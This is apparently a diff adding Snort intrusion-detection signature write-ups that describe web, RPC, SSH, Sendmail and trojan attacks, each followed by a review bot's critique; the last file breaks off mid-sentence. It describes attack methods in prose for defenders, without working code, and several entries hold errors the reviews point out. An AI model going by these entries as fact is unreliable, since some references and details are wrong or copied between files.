+Rule:  
+
+--
+Sid:
+2367
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the PHP web application PhpGedView.
+
+--
+Impact:
+Execution of arbitrary code on the affected system
+
+--
+Detailed Information:
+PhpGedView contains a flaw such that it may be possible for an attacker
+to include code of their choosing by manipulating the PGV_BASE_DIRECTORY
+parameter when making a GET or POST  request to a vulnerable system.
+
+It may be possible for an attacker to execute that code with the
+privileges of the user running the webserver, usually root.
+
+--
+Affected Systems:
+	PhpGedView 2.65.1 and earlier
+--
+Attack Scenarios:
+An attacker can make a request to an affected script and define their
+own path to the PGV_BASE_DIRECTORY variable.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2003-07.html
+
+--
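Review bot: The CERT reference CA-2003-07 is the Sendmail remote buffer overflow advisory, not a PhpGedView advisory; replace it with the correct reference or drop it. "privileges of the user running the webserver, usually root" is wrong as a generalisation, since web servers normally serve requests as an unprivileged account; say "the web server user". Minor: double space in "GET or POST  request", and the blank line before "--" is missing after Affected Systems.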
--- /dev/null
+++ b/doc/signatures/2569.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+2569
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
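Review bot: the Summary and Detailed Information never say which vulnerability or which request pattern SID 2569 matches; "a known vulnerability on a web server or a web application" could describe any web rule. Name the script or request string the rule looks for and fill in Additional References, which is empty. Several lines also carry trailing whitespace ("exploit a known ", "code of ", "and the ").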
--- /dev/null
+++ b/doc/signatures/1220.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1220
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
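Review bot: the body of 1220.txt is word-for-word the same generic text as 2569.txt, so a reader cannot tell the two rules apart; the Summary should state what SID 1220 actually detects, and Additional References should not be left empty. Trailing whitespace on "exploit a known ", "code of " and "and the " should be trimmed.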
--- /dev/null
+++ b/doc/signatures/3301.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3301
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
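Review bot: "Expoit" in Ease of Attack is a typo for "Exploit". The Attack Scenarios paragraph (a request for a file with an overly long filename via a network share) does not match the Detailed Information, which describes malformed data sent to an RPC port; one of the two should be corrected so they describe the same attack. Additional References is empty although a Microsoft bulletin exists for this issue and should be cited. The Corrective Action should also say the port blocking is a mitigation, not a substitute for the patch, since the Detailed Information notes the bug is reachable by any client that can talk to the RPC service.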
--- /dev/null
+++ b/doc/signatures/2469.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2469
+
+--
+Summary:
+This event is generated when an attempt is made to gain access to
+private resources using Samba.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to use Samba to gain
+access to private or administrative shares on a host.
+
+--
+Affected Systems:
+	All systems using Samba for file sharing.
+	All systems using file and print sharing for Windows.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+direct access to Windows adminsitrative shares.
+
+--
+Ease of Attack:
+Simple. Exploit software is not required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
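Review bot: "adminsitrative" in Attack Scenarios is a typo for "administrative". The Corrective Action only covers patching, but the event describes access to private or administrative shares, so advice on restricting share access (for example the smb.conf "valid users" and "hosts allow" settings, and not exposing SMB to untrusted networks) would be more useful than patch advice alone. Additional References is empty.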
--- /dev/null
+++ b/doc/signatures/1810.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+
+1810
+
+--
+Summary:
+This event is generated when an attack against an OpenSSH (v2.9 - 3.3) server using the GOBBLES exploit was successful.
+
+--
+Impact:
+Full system compromise with escalated privileges.
+
+--
+Detailed Information:
+This attack exploits the "remote challenge-response" vulnerability in older versions of OpenSSH servers. The vulnerability affects OpenSSH versions 2.9 through 3.3 that have the challenge response option enabled and that also use SKEY or BSD_AUTH authentication. 
+
+--
+Affected Systems:
+Any UNIX Servers that have vulnerable OpenSSH daemon running including but not limited to the following:
+	Mandrake Soft Linux 7.1, 7.2, 8.0, 8.1, 8.2
+	OpenBSD 3.0, 3.1
+	Red Hat Linux 7.0, 7.1, 7.2, 7.3
+	SuSe Linux 6.4, 7.0, 7.1, 7.2, 7.3
+
+--
+Attack Scenarios:
+An attacker first determines what version of OpenSSH the targeted machine is running then launches a publicly available GOBBLES exploit script against it.
+
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disable S/Key and BSD Authentication by modifying the sshd_config file
+
+	ChallengeResponseAuthentication no
+
+Upgrade to OpenSSH v3.4 or later
+
+Apply the appropriate vendor supplied patch.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Nawapong Nakjang (tony@ksc.net, tonie@thai.com)
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2002-18.html
+
+--
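Review bot: the Sid block has a blank line between "Sid:" and "1810", unlike the other files where the value follows the label directly; this matters if the files are parsed by a script. The Corrective Action says to disable S/Key and BSD authentication, but the sshd_config line shown ("ChallengeResponseAuthentication no") disables challenge-response authentication as a whole; the sentence should say that, since that is what the setting does. "Any UNIX Servers" should be "Any UNIX servers".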
--- /dev/null
+++ b/doc/signatures/994.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 994
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
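Review bot: the Impact line "Information gathering possible administrator access." is missing punctuation between the two items ("Information gathering. Possible administrator access."). The Sid value is placed on the same line as the "Sid:" label, unlike the other files. The Summary does not name the file or request the rule matches, so the reader cannot judge the False Positives claim of "None Known"; it should say which sensitive file the request targets.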
--- /dev/null
+++ b/doc/signatures/119-12.txt
@@ -0,0 +1,61 @@
+Rule: 
+
+--
+Sid: 
+119-12
+
+-- 
+Summary: 
+This event is generated when the pre-processor http_inspect
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+Unkown.
+
+--
+Detailed Information:
+This event is generated by the http_inspect pre-processor when a tab
+character is detected in a web request. This is non-standard, but Apache
+web servers may use this character as a space delimeter.
+
+--
+Affected Systems:
+	Apache web servers
+
+--
+Attack Scenarios: 
+An attacker may supply the tab character in place of a space in a web
+request.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Daniel Roelker <droelker@sourcefire.com> 
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+HTTP IDS Evasions Revisited - Daniel Roelker
+http://docs.idsresearch.org/http_ids_evasions.pdf
+
+--
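Review bot: "Unkown." under Impact is a typo, and the impact is not really unknown: the Detailed Information and the cited HTTP IDS evasions paper show the tab-as-delimiter trick is an IDS evasion technique, so Impact should say so. "delimeter" should be "delimiter". The Summary is generic http_inspect text; it should state that the alert fires on a tab character used as a delimiter in a web request.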
--- /dev/null
+++ b/doc/signatures/100000578.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000578
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "cat_search.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "cat_search.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
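Review bot: the Attack Scenarios paragraph describes an authentication bypass ("access an authentication mechanism and supply his/her own credentials"), which does not match the remote file include described in the Summary and Detailed Information; it should describe a request that passes a remote URL in the "admin_template_path" parameter of "cat_search.php". "ona web server" is missing a space, "may indicate that an exploitation attempt has been attempted" is redundant, and the Sid, Affected Systems and Contributors sections lack the blank line before "--" used elsewhere.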
--- /dev/null
+++ b/doc/signatures/495.txt
@@ -0,0 +1,59 @@
+Rule: 
+
+--
+Sid: 495
+
+-- 
+
+Summary: 
+This event is generated by an unsuccessful attempt to execute a command. This may be indicative of post-compromise behavior indicating the use of a Windows command shell.
+
+-- 
+
+Impact: 
+Serious. An attacker may have the ability to execute commands remotely
+
+--
+Detailed Information:
+This event is generated by an unsuccessful attempt to execute a Windows command which generates the response "Bad command or filename". For example, it is generated by the Windows operating system if the executable file to be run from the command line is not found. 
+
+Seeing this response in HTTP traffic indicates that an attacker may have been able to spawn a shell bound to a web port and has tried to execute a command. Note that the source address of this event is actually
+the victim and not that of the attacker.
+
+--
+
+Attack Scenarios: 
+An attacker gains an access to a Windows web server via IIS vulnerability and manages to start a cmd.exe shell. He then tries to run other commands on the machine.
+
+-- 
+
+Ease of Attack:
+Simple. This post-attack behavior can accompany different attacks.
+
+-- 
+
+False Positives:
+This rule will generate an event if the string "Bad command
+or filename" appears in the content distributed by a web server, in
+which case the rule should be tuned.
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action:
+Investigate the web server for signs of compromise.
+
+Look for other IDS events involving the same IP addresses.
+
+--
+Original rule writer unknown
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
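Review bot: the "Contributors:" heading is missing before "Original rule writer unknown" near the end of the file, and there is no Affected Systems section at all; both should be added so the file matches the others. In Attack Scenarios, "via IIS vulnerability" should read "via an IIS vulnerability". The note that the source address of the event is the victim rather than the attacker is important and is worth repeating under Corrective Action, since an analyst following the usual source/destination convention will otherwise investigate the wrong host.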
--- /dev/null
+++ b/doc/signatures/1972.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+1972
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow vulnerability associated with BlackMoon FTP server PASS command. 
+
+--
+Impact:
+Remote access.  A successful attack may permit the remote execution of arbitrary commands with privileges of the process running the BlackMoon FTP server. 
+
+--
+Detailed Information:
+The BlackMoon FTP server offers FTP software for Windows hosts.  A vulnerability exists with the PASS command that can cause a buffer overflow and permit the execution of arbitrary commands with the privileges of the process running the BlackMoon FTP server.  The buffer overflow can be caused by supplying an overly long argument with the PASS command.   
+
+--
+Affected Systems:
+Hosts running BlackMoon FTP Server 1.0 through 1.5. 
+
+--
+Attack Scenarios:
+An attacker can supply an overly long file argument with the PASS command, causing a buffer overflow.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com> 
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0126
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-1035
+
+--
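Review bot: in Attack Scenarios, "an overly long file argument with the PASS command" is wrong; PASS takes a password, not a filename, and the Detailed Information correctly says "an overly long argument". Two CVE references are listed while the Summary names a single issue; confirm both apply to the BlackMoon PASS overflow. Trailing whitespace on several lines should be trimmed.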
--- /dev/null
+++ b/doc/signatures/2085.txt
@@ -0,0 +1,85 @@
+Rule:
+
+--
+Sid:
+2085
+
+--
+Summary:
+parse_xml.cgi script on a webserver.
+
+--
+Impact:
+Arbitrary code execution, information disclosure and possible cross site
+scripting.
+
+--
+Detailed Information:
+Multiple vulnerabilities exist in Apple Quick Time Streaming Server and 
+Apple Darwin Streamin Server, such that an attacker can gain information
+on the file system as an intelligence gathering activity for an attack 
+on vulnerable services.
+
+It is also possible for an attacker to inject malicious code into the 
+log file for the server, the impact of this would be to execute the code
+when viewed by the administrator.
+
+It is also directly vulnerable to cross site scripting issues.
+
+--
+Affected Systems:
+	Apple Darwin Streaming Server 4.1.2
+	Apple Quicktime Streaming Server 4.1.1
+
+--
+Attack Scenarios:
+In the case of injecting code to the log files, the attacker would need 
+to make requests to the streaming server with the code inserted in the 
+request.
+
+The attacker can execute an attack on the file system contents using a 
+browser, the attacker needs to include a NULL byte in the request to 
+reveal the directory structure.
+
+The cross site scripting issue does not need anything specific to be 
+done.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate patches for the systems affected.
+
+Upgrade to the latest non affected versions of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/6960
+http://www.securityfocus.com/bid/6990
+http://www.securityfocus.com/bid/6955
+http://www.securityfocus.com/bid/6956
+http://www.securityfocus.com/bid/6958
+
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0054
+
+--
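Review bot: the Summary is truncated; it begins mid-sentence with "parse_xml.cgi script on a webserver." and the lead-in saying what the event is generated for is missing. It needs to be completed before this ships. "Streamin Server" is a typo for "Streaming Server", and "Quick Time" / "Quicktime" are spelled two ways in the same file.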
--- /dev/null
+++ b/doc/signatures/2260.txt
@@ -0,0 +1,57 @@
+Rule:  
+
+--
+Sid:
+2260
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in versions of Sendmail.
+
+--
+Impact:
+Remote arbitrary code execution.
+
+--
+Detailed Information:
+A vulnerability exists in the prescan() function used in Sendmail prior
+to version 8.12.9. This function contains an error when converting a
+character to an integer value while processing SMTP headers.
+
+--
+Affected Systems:
+All systems using Sendmail.
+
+--
+Attack Scenarios:
+An attacker could exploit this condition to process code of their
+choosing and open a listening shell bound to a high port, thus opening the
+system to further compromise.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade Sendmail to the latest non-affected verison.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
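Review bot: Affected Systems says "All systems using Sendmail" while Detailed Information limits the bug to versions prior to 8.12.9; Affected Systems should give the version range. "verison" in Corrective Action is a typo. Additional References is empty even though a vendor advisory exists for this issue.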
--- /dev/null
+++ b/doc/signatures/2605.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2605
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "compare_old_value" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by long strings in some parameters for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to either the "sname" or
+"oname" variables to cause the overflow. The result could
+permit the attacker to gain escalated privileges and run code of their
+choosing. This attack requires an attacker to logon to the database
+with a valid username and password combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck91.html
+
+--
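Review bot: the sentence "If you are running Oracle on a Windows server, make sure that the variable $ORACLE_PORTS is set to a value of "any"" is Snort configuration guidance, not a description of the vulnerability; it should be separated from Detailed Information (or moved to a deployment note) and should explain why it is Windows-specific. "a Oracle database" should be "an Oracle database". Attack Scenarios correctly states that a valid database login is required; Ease of Attack should reflect that precondition rather than just "Simple."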
--- /dev/null
+++ b/doc/signatures/2437.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2437
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in RealOne Player.
+
+--
+Impact:
+Serious. Execution of arbitrary code is possible.
+
+--
+Detailed Information:
+It may be possible for an attacker to execute code of their choosing by
+using a vulnerability in RealOne Player from RealNetworks. If a
+malicious URI is embedded in a SMIL presentation that points to script
+of the attackers choosing, the code may be executed with privileges
+assigned to the "My Computer" zone.
+
+--
+Affected Systems:
+	RealOne Player for Windows	
+
+--
+Attack Scenarios:
+An attacker could embed a URI of their choosing in a presentation and
+entice a user to click the link from within RealOne Player. The code
+referenced by this URI would then be executed on the client machine.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
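Review bot: Additional References is empty, so the reader cannot verify the SMIL URI issue described; cite the vendor advisory. Affected Systems lists only "RealOne Player for Windows" without versions, and that line has a trailing tab. "the attackers choosing" should be "the attacker's choosing".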
--- /dev/null
+++ b/doc/signatures/626.txt
@@ -0,0 +1,79 @@
+Rule:  
+ 
+--
+Sid:
+
+626
+
+--
+Summary:
+This event is generated when the Cybercop vulnerability scanner is used 
+against a host.
+
+--
+Impact:
+Cybercop can be used to identify vulnerabilities on host systems.
+
+--
+Detailed Information:
+This particular packet is a part of Cybercop's OS identification.  
+Specially crafted packets are able to elicit different responses from 
+different operating systems.  This packet is likely to be part of a full
+Cybercop scan rather than an isolated event. Having PUSH, ACK and 
+reserve bits 1 and 2 set at the same time is unusual.  While this rule 
+performs content as well as header checking to avoid false positives, 
+this flag combination in the TCP header is possible is possible in a 
+legitimate situation because of the addition of Explicit Congestion 
+Notification (ECN).
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+Cybercop can be used by attackers to determine vulnerabilities present 
+on a host or network of hosts that could be used as attack vectors.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+This tool can be used legitimately by a system and network 
+administrators.
+
+False positives from ECN enabled systems are possible.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+TCP packets with PUSH, ACK and reserved bits 1 and 2 set at the same 
+time are unusual but possible with Explicit Congestion Notification 
+(ECN).  It is advisable to block TCP packets with these flags set that 
+do not have the ECT bit (TOS bit 6) set in the IP header.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS149
+
+Security Focus:
+http://www.securityfocus.com/infocus/1205
+
+RFC:
+http://www.ietf.org/rfc/rfc2481.txt?number=2481
+
+--
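Review bot: "is possible is possible" in Detailed Information is a duplicated phrase, and "by a system and network administrators" should be "by system and network administrators". "reserve bits 1 and 2" in Detailed Information and "reserved bits 1 and 2" in Corrective Action should use the same wording. The ECN caveat is useful; since the text says the rule also performs content checking, stating what content is matched would let readers judge the false-positive risk on ECN-enabled networks.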
--- /dev/null
+++ b/doc/signatures/2271.txt
@@ -0,0 +1,58 @@
+--
+Rule:
+
+--
+Sid:
+2271
+
+--
+Summary:
+This event is generated when an attacker attempts to connect to the
+trojan FsSniffer.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources the machine is connected to.
+
+--
+Detailed Information:
+The FsSniffer program is a Trojan Horse designed to allow unauthorized
+external access to an infected host.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise may be due to the exploitation of another vulnerability and
+the attacker is leaving another way into the machine for further use.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+
+--
+False Positives:
+Security tool probing for netbus
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Delete the Trojan and kill any associated processes.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
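Review bot: the file opens with a stray "--" before "Rule:", unlike every other file. Affected Systems is empty. False Positives reads "Security tool probing for netbus", which names a different trojan and looks copied from another file; it should refer to FsSniffer or be removed. Corrective Action ("Delete the Trojan and kill any associated processes") should also advise investigating the initial compromise, as the Attack Scenarios text itself notes the host may have been broken into through another vulnerability.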
--- /dev/null
+++ b/doc/signatures/2536.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2536
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+US-Cert:
+http://www.kb.cert.org/vuls/id/150236
+
+--
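Review bot: "attcker" in Attack Scenarios is a typo. Detailed Information says the DoS affects "various software implementations" while Affected Systems lists operating systems only; naming the services that use the Microsoft SSL library would make the scope clearer. "Apply the appropriate vendor supplied patches" is missing its full stop.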
--- /dev/null
+++ b/doc/signatures/2949.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2949
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
